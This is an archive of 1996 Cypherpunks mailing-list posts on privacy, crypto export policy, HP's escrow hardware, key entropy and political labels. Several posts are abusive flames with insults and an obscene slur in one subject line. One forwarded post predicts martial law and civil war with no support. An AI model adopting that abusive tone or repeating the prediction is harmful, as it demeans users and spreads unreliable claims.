From: James Ormond <jimo@astea.com>
Date: Mon, 18 Nov 1996 17:12:16 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Extreme Left/Right
Message-ID: <Pine.HPP.3.91.961118184355.23458G-100000@hpg60.astea.com>
MIME-Version: 1.0
Content-Type: text/plain



Sandy,

I always had trouble understanding what people meant when they used the 
terms "extreme left" and "extreme right".  Then, about 4 months ago, I
saw a guy define the "political spectrum" the way (he said) it used to be 
defined before the definitions were corrupted (by whomever wants to 
divide - and conquer - the people).  It made sense to me.  A spectrum 
afterall, at least when we're talking about colors, starts with one type 
of color and graduates to other, DIFFERENT colors.

He defined the "political spectrum" as follows:

< ------- LEFT                                                 RIGHT ------->

            Monarchy      Oligarchy      Democracy      Republic      Anarchy

Rule by:      ONE            FEW           MANY           LAW           NONE

Examples:   Dictator,     Communist,      Lynch Mob     Constitutional
            King          Fascist State                 Govt (US before
                                                        1930's)


So, according to this definition of the political spectrum, a true 
"leftist" would be a person that supported the government's usurpation of 
individual rights, property rights, human rights, privacy rights, etc.  
Obviously we don't look at it this way.  The government only takes away 
our property (eg. through income taxes), etc. when it's FOR OUR OWN 
GOOD AND THE GOOD OF OUR COUNTRYMEN!!!

Sadly, this can only be done (in this country) by violating the US 
Constitution, and it has been done and it is being done.  

Unfortuneately, the people that support and seek to defend the Constitution 
(according to the political spectrum you see above) are on the right 
(those that support the Republic).  It's not politically correct to call 
yourself a "rightist" these days.  

Of course, there are not too many Americans (including people that call
themselves "leftists" or "liberals") that are willing to publicly admit
that they are opposed to the US Constitution.  I dare say that most 
leftists would actually say that they SUPPORT the US Constitution.  Many
of these people are very concerned about the deterioration of our 
liberties and spend a lot of time and energy educating themselves and 
others about how this is being done.  I know this because I used to 
consider myself a "leftist" (although I was never too fond of applying 
such labels to myself); after all, I had to be SOMEWHERE!!!  My political 
"education" started during the Reagan years.  Since that administration 
was considered "right-wing", I knew I didn't like that (because of the 
BAD things that it was doing) so I must be the opposite.

When I used to listen to a certain "leftist" radio station broadcasting 
out of New York City, they would talk about "left-wing", communist 
dictatorships and "right-wing", fascist dictatorships.  A dictatorship is 
a dictatorship!!!  The "wing" that it comes from makes no difference!!  The 
way the media defines these things makes no sense; you can't have a 
dictatorship on BOTH sides of a POLITICAL SPECTRUM no more than you can 
have YELLOW on both sides of the COLOR SPECTRUM.

Maybe I'm totally wrong in my thinking.  If I am please try to clarify 
things for me.

I bring this to your attention only because I notice that you often use 
these terms in some of your e-mails.

I think that most "leftists" and "rightists" want many of the same 
things.  We can't get together because the language we use has been so 
corrupted.  


Sincerely,

Jim.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Mon, 18 Nov 1996 20:17:11 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: FCPUNX:Playing Cards
Message-ID: <1.5.4.32.19961119041700.0057ad64@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP UNSIGNED TEXT-----
At 03:14 PM 11/14/96 -0800, ph@netcom.com (Peter Hendrickson) wrote:
>It would be nice if cryptography software would allow you to enter
>randomly selected playing cards from time to time to increase the
>entropy of keys.  Careful people (Black Unicorn?) would enter the
>cards prior to sending each message.

If the keyboard-entropy program you're using hashes in the values
of the keys typed as well as the timing, this can let you improve the
actual entropy of the data you enter.  Get yourself a deck of cards
or some 20-sided D&D dice or toss some yarrow stalks or open a book randomly,
and type in those values rather than the fjfjfjfjfj stuff you
might otherwise use.  Won't hurt, and it'll let you be sure you've
got all the entropy you need*

                                Bill Stewart, lurking from fcpunx

[*Depending on how the universe has been treating you recently...]

-----PGP UNSIGNATURE BLOCK-----
32767WHATISSIXTIMESNINE23THEUMBERHULKHITS42GRATEFULDEAD10OFSWORDS
-----END PGP UNSIGNATURE BLOCK-----

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Mon, 18 Nov 1996 23:51:03 -0800 (PST)
To: "Bill Frantz" <cypherpunks@toad.com>
Subject: Re: It is getting easier
Message-ID: <199611190750.XAA19020@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996 13:02:10 -0800, Bill Frantz wrote:

>At 11:25 PM 11/14/96 -0800, Lucky Green wrote:
>>If I remember correctly, some of the newer transponders used on 
>>commercial aircraft actually transmit GPS data back to the controller in 
>>real time. I wonder how long it will be before the FAA will include such 
>>information in their database.
>
>I don't think new transponders make much difference.  The old ones heighten
>the radar image of the airplane which gives an accurate 2D position.  This
>position is automatically entered into the FAA computer which maintains the
>ATC controller's display.  In the old style, altitude is determined by an
>altimeter on the airplane which encoded into the transponder signal.
>
>If newer transponders are returning GPS signals, the position may be more
>accurate (but probably not unless they can decode the selective
>availability signal).  (OBCrypto for those who care.)
>
>
>>"To obtain the position of any passenger flight in the US within 10 
>>meters, click here."
>
>In either case, the Passenger Name Records for the flight are in the
>airlines databases (and have been there for many years), and the airplane's
>physical position is in the FAA's computer (and has been for many years). 
>The ability to find the current position of an airplane, or a passenger
>remains dependent on the incentives and disincentives for database linking
>and application development.  There are no insurmountable technical
>problems.  The technical problems are those of getting old-technology
>software to do something new.
>


Wouldn't it be a breach of privacy to alow anyone to know the location
of a passanger?  A plane maybe, but the roster of passangers is 
protected by the Privacy Act.

just my 2 cents.


mhayes@infomatch.com

It's better for us if you don't understand
It's better for me if you don't understand
                                             -Tragically Hip





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmr@rmisp.com (Justin Robbins)
Date: Mon, 18 Nov 1996 19:18:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: NT insecurity
Message-ID: <3.0.32.19961118194954.00964d10@rmisp.com>
MIME-Version: 1.0
Content-Type: text/enriched

Well, for those uninformed out there who believe that you can penetrate an NT box using NTFSDOS, the problem remains that security in windows NT is a combination between the filesystem NTFS and the actual operating system, NT.  NTFSDOS only allows reading the drives, not writing to them.  NT also keeps the security registry keys/information in approximately 25 areas, not in 1 password file.

So..

ya can't "erase a password file under NT" because they don't exist.

There's my 2 cents for this 60+ letter a day mailing list.


Justin Michael Robbins
of Dreamage Technologies

jmr@rmisp.com0000,0000,8080">								

warlock@thepentagon.com
Please use the 1-888-401-2862 Paging/Messaging system for immediate response.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Mon, 18 Nov 1996 21:21:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP GAK Proposal
Message-ID: <1.5.4.32.19961119052111.003c4884@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.dmo.hp.com/gsy/security/icf/main.html
is a proposal by HP; don't know if it's the same as what they
announced Monday.  It's the approach they talked about 6 months ago or so,
hardware solution with "tamperproof" module and government policy plugins.
The example they show pictures of is a PCM-CIA card with little tabs
you can plugin with US, UK, and some other flag on them, which would 
let your card do US, UK, and other flavors of GAK.

It's nice to see an announcement the same week for
strong-crypto plugins for Netscape, developed in Israel.....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark.L. Burton" <wbear@hotmail.com>
Date: Mon, 18 Nov 1996 17:26:18 -0800 (PST)
To: gathering@cygnus.com
Subject: Re: (Fwd) National Emergency
Message-ID: <19961118212932.25483.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



>Subject: (Fwd) National Emergency

 from: gathering@cygnus.com Mailing list alt.gathering.rainbow
>------- Forwarded Message Follows -------
>Date:          Sun, 17 Nov 1996 17:42:58 -0800 (PST)
>From:          Phil Agre <pagre@weber.ucsd.edu>
>To:            rre@weber.ucsd.edu
>Subject:       National Emergency
>Reply-to:      rre-maintainers@weber.ucsd.edu
>
>
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>This message was forwarded through the Red Rock Eater News Service (RRE).
>Send any replies to the original author, listed in the From: field below.
>You are welcome to send the message along to others but please do not use
>the "redirect" command.  For information on RRE, including instructions
>for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>Date: Fri, 15 Nov 1996 17:23:24 -0800
>From: Hal Finney <hal@rain.org>
>To: cypherpunks@toad.com
>Subject: National Emergency
>
>Michael Froomkin posted to the cyberia list a pointer to the Clinton
>administration's new export policy.  He has a copy on his web site at:
><URL: http://www.law.miami.edu/~froomkin/nov96-regs.htm >.  The thing
>I found interesting is that it refers to the fact that we are currently
>living under a state of national emergency!  I searched on the whitehouse
>web site and couldn't find the executive order referred to (maybe it was
>classified) but did find this one:
>
>For Immediate Release                             June 30, 1994
>
>
>  Executive Order
>      #12923
>   - - - - - - -
>
>     Continuation Of Export Control Regulations
>
>
>  By the authority vested in me as President by the
>Constitution and the laws of the United States of America,
>including but not limited to section 203 of the International
>Emergency Economic Powers Act ("Act") (50 U.S.C. 1702), I, William
>J. Clinton, President of the United States of America, findthat
>the unrestricted access of foreign parties to U.S. goods,
>technology, and technical data and the existence of certain
>boycott practices of foreign nations, in light of the expiration
>of the Export Administration Act of 1979, as amended (50 U.S.C.
>App. 2401 et seq.), constitute an unusual and extraordinarythreat
>to the national security, foreign policy, and economy of the
>United States and hereby declare a national emergency with respect
>to that threat.
>
>Apparently this state of emergency is still in effect.  This is what
>gives the President the power to unilaterally make changes in the export
>policy.  It would be nice if our congresspeople would take some
>responsibility in this matter.
>
>Hal
>
>
>
>{{greywolf@sover.net}}PGP Public key>>
>http://www.sover.net/~greywolf/gwkey.asc
>
********************************************************************** 

 We have been living in a state of serveal national emergancy for some time,but
you wont find any public documents about it.
 The emergancy conserns break away factions with in the U.S.
citezenry.This country is falling apart at the seams and a form of civil war is
predicted soon.
 The Federal govenment will respond by declaring Martial law on all
U.S. Citezens.
 They are allready prepareing for this war.I sugjest We prepair to.


Peace Love and Light :)
Wandering Bear
EarthSky Tribes
Cascadia Nation
Rainbow Family of Living Light
http://www.geocities.com/RainForest/1137

---------------------------------------------------------
Get Your *Web-Based* Free Email at http://www.hotmail.com
---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 18 Nov 1996 19:25:28 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: The Utility of Privacy
In-Reply-To: <199611181953.LAA05242@mailmasher.com>
Message-ID: <199611190342.VAA00399@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 6:55 AM 11/18/1996, Sandy Sandfort wrote:
> >C'punks,
> >> Examples [of people who have suffered due to loss of privacy]?
> >Phil Zimmermann often tells the story of a woman whose marriage
> >was destroyed by the revelation of a long-past indiscretion. 
> >After her husband divorced her, she committed suicide.
> Deceiving your spouse is not a good reason to protect your privacy.

      Sure it is. Earlier this year I threw a party for my wifes birthday.
A suprise party. I had to deceive her to keep her out of the house I needed
privacy to do this.    

> >Any number of celebrities have been stalked, attacked and even
> >killed by obsessed fans who found them through public records.
> Unfortunately most readers of this list do not have this problem.

     It is still a valid example. Someone made the claim that people do not
need privacy, this is an example of someone who needs it. 
> >Every year, children and business executives are kidnapped for
> >ransom.  The proximate cause of these kidnappings is a breach in
> >privacy about the whereabouts and schedules of the victim.  
> Or this problem.

     See above.

> >Hitler's gun registration in Germany allowed the Jews to be
> >disarmed.  I'm sure you are aware of the ultimate consequences
> >of that little invasion of privacy.
> Not a bad example, but genocide happens rarely.

     Germany. Cambodia, Boznia, Somilia, Rwanda & Zaire. Soviet Russia, 
China...

     All within the last 60 years. 

     Yup. Rarely happen. 

> Those alert enough to protect their privacy in advance might be alert
> enough to get out in time, anyway.
> Subjective utility: low.
> 
> >The US Post Office co-operated in the identification and 
> >imprisonment of people of Japanese ancestry during the second
> >world war.
> 97,000 victims over a ~100 year period.  Doesn't really show up on the
> scope, sorry.  (Plus downside bad, but few were murdered.)

     I am sure that there are other victims in the PO's history, but 
not with as big of numbers. 

     1 is a crime, 100,000 is a crying shame. 

     You know that red thing you see when you open your eyes? It's your 
prostate. 


> >The problem with having a whole lot of private information about
> >you floating around in public is not what damage it can do to you
> >now, but rather the problems it potentially could cause in the
> >will you be about them if there is extreme right or left takeover
> >in the future?  Start to get the picture?
> These things CAN happen.  Will they happen?  Odds are low.
> BTW, are you operating under your True Name?

     I am, but I don't mind being a target. 

     If you think privacy is so bad, why are you indulging in it. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 18 Nov 1996 19:15:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
In-Reply-To: <Pine.SUN.3.91.961118063411.10538D-100000@crl8.crl.com>
Message-ID: <J7DmXD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> Any number of celebrities have been stalked, attacked and even
> killed by obsessed fans who found them through public records.

Sandy should learn some English.

> The US Post Office co-operated in the identification and
> imprisonment of people of Japanese ancestry during the second
> world war.

Sandy doesn't see the difference between the Post Office and the Census Bureau.
Sandy is a typical cypherpunk, one of John Gilmore's brainless stormtroopers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 18 Nov 1996 22:09:27 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: How to slow the animals ...
In-Reply-To: <Pine.LNX.3.94.961119045608.1139B-100000@random.sp.org>
Message-ID: <Pine.3.89.9611182253.A23579-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


> "Abuse-resistance" is simple: If somebody abuses the list, warn them.  If
> they continue, John does what he did to Vulis. Good Thing. 'nuff said.

As we all noticed, doing what John did was of little help. While I 
support John in his decision, I believe the the offenders should be 
source blocked as well.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 18 Nov 1996 22:57:32 -0800 (PST)
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: ?????
In-Reply-To: <199611181848.KAA17573@abraham.cs.berkeley.edu>
Message-ID: <32915414.311E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


John Anonymous MacDonald wrote:
> Date: Sun, 17 Nov 1996 05:36:00 -0800
> To: cypherpunks@toad.com
> (John Anonymous MacDonald) apparently wrote:
> |Dale Thorn wrote:
> |>people on a list are given tools to filter with and reminded on |>occasion
> |>how to use them?

> |You are the reason, you can't shut up and you have little or nothing |to say. plonk.
> I wish I'd said that; my fear is that Dale will take 17 messages to compose his vapid thoughts.
> Love you all.

Strange love, huh?  For the record, I replied to your previous hate mail
privately to avoid putting totally useless stuff on the list, but since
you insist on pressing the (useless) point, Mr./Ms. Censor-happy asshole,
I'll say it publicly (assuming *they* allow it):  Take a hike, a long walk
off a short pier, etc.  Nobody really cares about you or what you think,
probably not even your mother.  This is not a love forum, it's a forum
by and for ego-maniacal paranoids who don't really love anyone but them-
selves, or maybe a really close friend (likely no more than one) just
enough to not kick them out onto the street.

BTW, I'm not saying that ego-maniacal paranoids are necessarily a bad
thing, particularly in a world full of rednecks (their counterpart, but
with less brainpower), just that they need to be reminded now and then
that they are *not* in fact gods or godoids or whatever.

BTW-2, you're probably still smarting from when I told you that your
precious PGP et al is basically 1940's technology attempting to run on
processors that should be relegated to pocket PDA's.  You really should
grow up and work on something that can use the brain cells you have left.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 18 Nov 1996 22:31:28 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: HP announcing some International Cryptography stuff on Monday
Message-ID: <199611190631.WAA25180@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:44 PM 11/17/96 -0800, Lucky Green wrote:
>I have a hard time believing that Netscape caved. As I wrote in July, HP 
>was working on selling our children's birthright to obtain an export 
>license for their product. But Netscape participating in this just 
>doesn't sound right.

I agree about Netscape.  IMHO they started with their hearts in the right
place, but with a naive lack of experience in real-world security.  Since
their hearts are in the right place, and they have good people, they have
improved a LOT in the last year.


>> Since I am inherently optimistic, one ray of light may be that the San Jose
>> Mercury News was mentioning the ability to export the system, and then when
>> the necessary licenses (US and foreign) were obtained, turn on the
>> encryption.  I guess from this that the encryption is in hardware.  Now,
>> software/hardware interfaces are usually fairly simple, so what we have
>> here is a software system with a crypto hook.
>
>One possibility is that all crypto is done in hardware. The recent 
>announcements by many hardware manufacturers that smartcard readers will 
>be included in all their products (MS will put them into their keyboards) 
>might get the necessary infrastructure deployed.

I was assuming that you would interface software crypto where the hardware
crypto goes.  The best way to hack this will depend on the specific
implementation.  (At the same time you are gronking* the software calls to
the hardware, you can gronk the signature checking code.)

* gronk v.t. To hit over the head with a club.  From Johnny Hart's cartoon, B.C.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 18 Nov 1996 22:57:41 -0800 (PST)
To: Stephen Boursy <boursy@earthlink.net>
Subject: Re: Fuck You Dumb Cunt
In-Reply-To: <199611182134.NAA08552@kachina.jetcafe.org>
Message-ID: <32915780.27B0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Boursy wrote:
> Dave Hayes wrote:
> > Brian Davis writes:
> >> I'm especially sorry that some of you don't believe in property
> >> rights.

> > I believe in them, alright. It's just that they seem to be at odds
> > with freedom of speech.
> > They are at odds with a lot of other things as well, but that's
> > a different fla...er...discussion.

>   I believe the posession of property is a priv. to be taken
> away if abused.  There is no such thing as a 'right' to
> property--in fact the very notion seems absurd.

You've just lumped all possessions into a single category.  There's a
valid argument against private ownership of land when ownership of that
land can be (and usually is) moved from the people at large to just a
few people, then eventually to dictators, etc.

But are you suggesting that if I trade my labor for some material item
which was built with other people's labor, and that material item is
sufficiently portable that it doesn't have to occupy a significant
piece of real estate (i.e., a house, a large boat), *they* should be
able to take that material item away from me anyway on whatever pretext,
on the basis that possession of it is a *privilege*?  Is my paycheck,
given to me directly for my labor just a privilege?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 18 Nov 1996 23:00:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: HP announcement
In-Reply-To: <3.0b28.32.19961118103631.006b5260@ricochet.net>
Message-ID: <v03007802aeb70b2595c7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:26 PM -0600 11/18/96, Mike McNally wrote:

>A lot of the security (that is, "security" from the point of view of
>nervous Federales) seems to rely on certificates and tokens that are
>supposedly spoof-proof (I guess).  Looks to me as if application
>certificates will be rather difficult to protect from being "abused".
>It's also not clear to me how they'd prevent my flying to Luxembourg,
>getting a Policy token that allows any & all crypto functions, and
>then flying my butt back to Singapore for an encryption party.

Or using the method someone (Duncan?) suggested a few years ago: recruit a
bunch of derelicts and winos and other such "invisibles" to apply for
Official Permissions in their own True Names, pay them off with the bottle
of Thunderbird promised them, and, voila!, one has a unique Official
Permission (policy card, for example).

Absent biometric identification or other complicated verification (such as
geographic methods...I'm dubious), I can't see how this wouldn't work.

(And I think there will be dozens of other ways to subvert the H-P/Intel
system.)

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 18 Nov 1996 23:15:00 -0800 (PST)
To: James Ormond <jimo@astea.com>
Subject: Re: Extreme Left/Right
In-Reply-To: <Pine.HPP.3.91.961118184355.23458G-100000@hpg60.astea.com>
Message-ID: <32915E11.3DBE@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


James Ormond wrote:
> Sandy,
> I always had trouble understanding what people meant when they used the
> terms "extreme left" and "extreme right".  Then, about 4 months ago, I
> saw a guy define the "political spectrum" the way (he said) it used to be
> defined before the definitions were corrupted (by whomever wants to
> divide - and conquer - the people).  It made sense to me.  A spectrum
> afterall, at least when we're talking about colors, starts with one type
> of color and graduates to other, DIFFERENT colors.

[snip]

Tell ya' something you might find amusing:  During the 1992 campaign,
when I worked for awhile for Perot The Populist, I also sent personal
letters to every right- and left-wing organization I could find out
about (a couple thousand orgs and individuals), and I kept track of the
responses.

My records indicated that the orgs and individuals identified closely
with the *Right* were twice as responsive as those on the *Left*, and
easily ten times as friendly.  There's something to be said about the
down-home sincerity of those folks in small-town America, as opposed to
the ruthless, cynical people who mostly populate the left-wing positions
of influence today in big cities.

Of course, if the Right were to seize power from the Left today (i.e.,
take over newpapers, TV, and so on), what I've described might shift
a bit.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 18 Nov 1996 21:37:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
In-Reply-To: <199611171612.IAA01572@mailmasher.com>
Message-ID: <199611190651.AAA00275@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199611171612.IAA01572@mailmasher.com>, on 11/17/96 at 12:12 PM,
   nobody@huge.cajones.com (Huge Cajones Remailer) said:

>I know many people who were happy they had insurance due to car
>accidents, health problems, or whatever.  What is more, the odds of
>these events are carefully calculated and available.  Call an actuary.

>Are there similar sources of information calculating privacy risk?  I
>don't think so.

>Informally, I don't know anybody who has suffered due to a loss of
>privacy.

>It may be the case that it is politically beneficial to have a society
>of privacy fanatics.  But, this is different from the direct benefit
>to each participant.

>My question remains unanswered, probably because privacy isn't worth
>the effort.

Well I can give you a couple of examples from personel "suffering" from loss of privacy:

#1. While living in KC I had a co-worker obtain my SS# which he then used to have all his
utilities put in my name. (Utility companies only asked for SS#, Name & Place of
employment). I did not find this out until 9mo. later when I went to have utilities turned
on in my new house. (I was previously living in an apartment which utilities were included
in the rent). It took several months, an attorny & many calls to the utility board to get
the mess straightend out.

#2. The Ill. State Police got my name cross-referenced with a convicted fellon in thier
computer system. Didn't find this one out until I needed to get my security clearance
renewed for a contract. Needless to say the client was not pleased. This took over a year
to get straightend out and god only knows how many other computer systems still has me
listed as a convicted car theif. Funniest part is that while this guy was rotting in jail
I was living overseas.

It is all too easy today with the current state of computer & information technology to
get f***ed. Needless to say I take my privacy much more seriously than I did before.

- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    
Cooking With Warp 4.0

Author of E-SECURE - PGP Front End for OS/2

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
*MR/2 ICE: OS/2: Your brain.  Windows: Your brain on drugs.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpE57Y9Co1n+aLhhAQEfuQP/bePn5mwfEPiY96AOG9OhOiY8/nAYUXGJ
dza8KGRexQ1HT4prLm6ZRbMOh13yj+5zUOWU7jUVS3aSTWm83LdBLtMXlL0IuD01
YP06os1BT04+iQ08GhNdhviG2QWuubJfVfIcUMLe+Bekt5sgHx+xlhwRrksWICjP
N90lFbZ73ds=
=pRlg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Mon, 18 Nov 1996 23:02:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Irono-troll (was: Re: The Utility of Privacy)
In-Reply-To: <199611181953.LAA05242@mailmasher.com>
Message-ID: <961118.235844.8Q8.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

A troll using nobody@huge.cajones.com writes in reply to Sandy Sanfort a
lot of dismissal of past tragedies resulting from privacy violations.
Hir consistent viewpoint seems to be that protecting ones privacy has no
value.  Then sie has the temerity to ask

> BTW, are you operating under your True Name?

My ironometer is absolutely pegged.
- -- 
Roy M. Silvernail --  roy@scytale.com
           "I used to be disgusted, but now I'm just amused."
            -- from an old T-shirt(ca. 1975), not an Elvis Costello lyric

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpFQkRvikii9febJAQGzMwP9GohOAkCgySe6AMQBo7p5pix5IhpbJ5Ag
srWHv7bp/ARzOx39kMDUhNf/R0+hW4s+emJdn40tRhu0ZKroFzahMU1NPn/COUPO
p1ecbXxmWmUISgB3Xq/rl4kwIf6yx/z0mvId1fXEUGkhu686aaukSvnKJ583VbNL
HlPfR9hS4OM=
=w4LD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: piotrk@opnt.optimus.wroc.pl
Date: Mon, 18 Nov 1996 21:04:45 -0800 (PST)
Subject: Unsubtroll
Message-ID: <199611190504.AAA09997@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


unsubtroll




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 18 Nov 1996 22:20:12 -0800 (PST)
To: Bryondp@aol.com
Subject: Re: POC_ket
In-Reply-To: <961118184128_1083259824@emout08.mail.aol.com>
Message-ID: <199611190735.BAA00615@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <961118184128_1083259824@emout08.mail.aol.com>, on 11/18/96 at 07:41 PM,
   Bryondp@aol.com said:


>Take me off the list!!!!

Never!!!! You are doomed here forever!!!!!!!!!!!!! mahahahaha!!!!!! 
*MR/2 ICE: I don't do Windows, but OS/2 does.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpFEEo9Co1n+aLhhAQG1tgP+Jw4ls5JrpE5ZO0I/EySfFW3lfONdJbMz
nyGciKeClwN+eJ8Wbz9MjdBq3QLMC+sUNHTmxUuLDmnWA0SobWgl9hnxGUCvdugN
ur1I+WBZVG+VBRQE39THIwe0ncOQgPodGXW2KmpkP9F0Nz7Axd6B6xdlHcxJ36m/
7iC4Jgd6iu0=
=b1jT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 18 Nov 1996 22:46:29 -0800 (PST)
To: James Ormond <jimo@astea.com>
Subject: Re: Extreme Left/Right
In-Reply-To: <Pine.HPP.3.91.961118184355.23458G-100000@hpg60.astea.com>
Message-ID: <199611190801.CAA00778@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.HPP.3.91.961118184355.23458G-100000@hpg60.astea.com>, on 11/18/96 at 09:10 PM,
   James Ormond <jimo@astea.com> said:

[snip]

>I think that most "leftists" and "rightists" want many of the same 
>things.  We can't get together because the language we use has been so 
>corrupted.  


Actually most of those today that consider themselfs on the "right" or "left" are truly
socialist/statist. They have their select group of "rights" & special intrests that they
want protected but are often willing to distroy all other rights in the process.

The debate of socialism vs. capitalism died in this country decades ago. It now has
degenerated into what flavor of statism do you want?

Either a people are free or they are not. There is no middle ground. You can't be a little
pregnant. 

- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of E-SECURE - PGP Front End for OS/2

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
*MR/2 ICE: Turn your 486 into a Gameboy: Type WIN at C:\>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpFKL49Co1n+aLhhAQEfoAP/fs56AZntB4nMkNPB5mxTMdFEGHy+7DQb
Vjlu/HAI5ym8/nIjLZaSai/j2Rh+zH5KL65hAH0CTwaXnm2vV8nfwQ5p6PgKQv35
j2+FKoWycYLArpqydRGRtIXNpCMzfMuoNR5xN5OeOaiiXckJhyREVK+rkRyjBazc
